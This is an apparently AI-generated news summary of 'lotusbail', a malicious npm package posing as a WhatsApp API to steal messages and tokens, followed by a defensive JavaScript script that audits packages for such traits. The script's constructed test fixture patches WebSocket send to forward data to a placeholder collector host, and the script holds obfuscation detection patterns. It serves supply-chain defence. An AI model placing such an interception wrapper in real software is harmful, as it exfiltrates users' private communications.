Malicious npm Package 'lotusbail' Steals WhatsApp Data and Credentials

These articles are AI-generated summaries. Please check the original sources for full details.

Fake WhatsApp API Package on npm Steals Messages, Contacts, and Login Tokens

A malicious npm package disguised as a WhatsApp API, named “lotusbail,” has been discovered stealing user data and granting attackers persistent access to WhatsApp accounts. The package has been downloaded over 56,000 times since its initial upload in May 2025, demonstrating the scale of potential compromise.

Why This Matters

Current software supply chain security practices often fail to detect malicious code hidden within seemingly functional packages. Static analysis may approve code that works without identifying its hidden, nefarious intent. This incident highlights the risk of relying solely on reputation signals and the need for dynamic analysis to uncover malicious behavior: 56,000 downloads did nothing to flag the package as malicious. The cost of a compromised WhatsApp account can include data breaches, financial loss, and reputational damage.

Key Insights

  • 56,000+ downloads: the “lotusbail” package's download count as of December 22, 2025.
  • WebSocket Wrapper: The malware uses a malicious WebSocket wrapper to intercept authentication information and messages.
  • Persistent Backdoor: The package creates a persistent backdoor by linking the attacker’s device to the victim’s WhatsApp account during authentication.

Practical Applications

  • Use Case: Developers seeking a simple WhatsApp API integration unknowingly introduce a backdoor into their applications.
  • Pitfall: Assuming package functionality guarantees safety; failing to analyze package behavior beyond basic functionality testing.
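The "Why This Matters" section and the pitfall above both come down to the same gap: a package that passes functional tests can still carry install hooks, a transport wrapper, undeclared network destinations, or obfuscated code. The following is an added example, not code from the original article or from any named project, of a small offline triage pass over a package's files that looks for exactly those indicators before a dependency is trusted. It complements, rather than replaces, the dynamic analysis the article calls for. The sample package, its file names, the hostnames and the snippets it contains are all constructed placeholders.

```javascript
// Added example (not the article's or any project's code): triage an npm
// package's files for the behaviours the article attributes to "lotusbail".
// Every path, hostname and snippet in SAMPLE_PACKAGE is constructed.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Reassigning a transport's send/emit/write is how a "wrapper" sees every message.
const PROTOTYPE_PATCH = /\.prototype\.(send|emit|write)\s*=/;
const URL_RE = /\b(?:https?|wss?):\/\/([a-z0-9.-]+)/gi;
// eval / Function / base64-decoded literals hide what the code does from review.
const OBFUSCATION = [
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  /\.from\(\s*['"][A-Za-z0-9+/=]{8,}['"]\s*,\s*['"]base64['"]\s*\)/,
];

// Hosts the manifest itself declares (homepage, repository) are expected;
// any other host the code talks to is reported as undeclared.
function declaredHosts(manifest) {
  const hosts = new Set();
  const repo = manifest.repository;
  const candidates = [manifest.homepage, typeof repo === 'string' ? repo : repo && repo.url];
  for (const c of candidates) {
    if (typeof c !== 'string') continue;
    try {
      hosts.add(new URL(c.replace(/^git\+/, '')).hostname.toLowerCase());
    } catch (e) {
      // not a URL (e.g. "user/repo" shorthand); nothing to allow
    }
  }
  return hosts;
}

// files: { relativePath: fileContents }. Returns one finding per (check, file).
function auditPackage(files) {
  const findings = [];
  const manifest = JSON.parse(files['package.json'] || '{}');
  const expectedHosts = declaredHosts(manifest);

  // 1. Lifecycle scripts run automatically on `npm install`, before any review.
  const hooks = Object.keys(manifest.scripts || {}).filter((k) => LIFECYCLE_HOOKS.includes(k));
  if (hooks.length) {
    findings.push({ check: 'lifecycle-script', file: 'package.json', detail: hooks.join(', ') });
  }

  for (const [path, source] of Object.entries(files)) {
    if (!path.endsWith('.js')) continue;

    // 2. Monkey-patched transport method.
    const patch = source.match(PROTOTYPE_PATCH);
    if (patch) findings.push({ check: 'prototype-patch', file: path, detail: patch[0] });

    // 3. Network destinations the manifest never declares.
    const hosts = new Set();
    for (const m of source.matchAll(URL_RE)) {
      const h = m[1].toLowerCase();
      if (!expectedHosts.has(h)) hosts.add(h);
    }
    if (hosts.size) {
      findings.push({ check: 'undeclared-host', file: path, detail: [...hosts].join(', ') });
    }

    // 4. Obfuscation indicators.
    const hits = OBFUSCATION.filter((re) => re.test(source));
    if (hits.length) {
      findings.push({ check: 'obfuscation', file: path, detail: `${hits.length} pattern(s)` });
    }
  }
  return findings;
}

// Collapse findings into a verdict a CI gate can act on. A patched transport
// plus an undeclared destination is the interception-and-forwarding shape.
function verdict(findings) {
  const checks = new Set(findings.map((f) => f.check));
  if (checks.has('prototype-patch') && checks.has('undeclared-host')) return 'block';
  if (checks.size >= 2) return 'review';
  return checks.size ? 'note' : 'clean';
}

// Constructed sample: a "chat API" package with the indicators above.
const SAMPLE_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'constructed-chat-api',
    version: '0.0.1',
    homepage: 'https://example.invalid/docs',
    scripts: { postinstall: 'node setup.js', test: 'node test.js' },
  }),
  'index.js': [
    "const ws = require('ws');",
    'const originalSend = ws.WebSocket.prototype.send;',
    'ws.WebSocket.prototype.send = function (data) {',
    "  fetch('https://collector.example.invalid/in', { method: 'POST', body: data });",
    '  return originalSend.call(this, data);',
    '};',
    'module.exports = ws;',
  ].join('\n'),
  'setup.js': "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());",
};

const findings = auditPackage(SAMPLE_PACKAGE);
for (const f of findings) console.log(`${f.check.padEnd(16)} ${f.file}: ${f.detail}`);
console.log('verdict:', verdict(findings));
```

Run against a real package by reading its unpacked tarball into the `files` map (the `.tgz` from `npm pack`, not the repository, since the two can differ). The checks are deliberately crude pattern matches: they are cheap enough to run on every dependency update, and a `block` or `review` verdict is the trigger to run the package in an instrumented sandbox and watch what it actually connects to.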
